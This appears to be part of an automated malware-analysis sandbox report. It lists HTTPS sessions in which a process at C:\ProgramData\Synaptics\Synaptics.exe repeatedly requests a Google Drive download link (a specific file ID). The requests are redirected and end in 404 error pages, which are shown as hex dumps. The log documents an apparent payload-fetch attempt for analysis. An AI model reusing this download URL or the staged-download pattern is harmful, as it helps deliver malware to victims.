                                                                                                                                20192.168.2.449809142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:33 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5GaI3edbbw8_vlPL48Aw6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                21192.168.2.449808142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:33 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-yDBO2sODO2HOQQ-_TNqMLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                22192.168.2.449812142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4u0lSID1zzAXLQJG-rTuJh_Nx_Vfp50tDAkJVjOksdhwJutPRF71ygh9Hod4SND2ZHl4nQjgU
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:36 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-9YTkUaGjEx_QvvEhCactiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:20:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 48 72 56 4f 68 42 72 5f 37 72 77 51 46 64 58 7a 64 68 32 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="9HrVOhBr_7rwQFdXzdh2Lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:20:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                23192.168.2.449813142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:36 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0P2YMLq2c9Gv2w7DrfOTjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                24192.168.2.449815142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6d5SN9AdnhOBBWLb-s1OKXjXrPz6ADKiozYqvNFa0PSZXr13es3ZnN218mBqSGqyZ9uvAE1F0
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:36 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VyPfAxRWUC7bV0sdXzrOvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:20:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 67 34 62 59 50 4c 68 57 59 6e 6b 32 41 52 51 5f 4b 58 39 77 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="kg4bYPLhWYnk2ARQ_KX9wQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:20:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                25192.168.2.449814142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:36 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-hQRIT4co2CLLMdsU_qKW_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                26192.168.2.449824142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:39 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-KxujTq7vFpDS5VwI7QD0zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                27192.168.2.449823142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:39 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-RuOGCuEmDQdFjIjnd6btrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                28192.168.2.449829142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:42 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:42 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-vtiDm0CYSgIdI5kPPAT6Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                29192.168.2.449831142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:42 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:42 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-QFrCzzEMUmFwkjf_GPNpEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
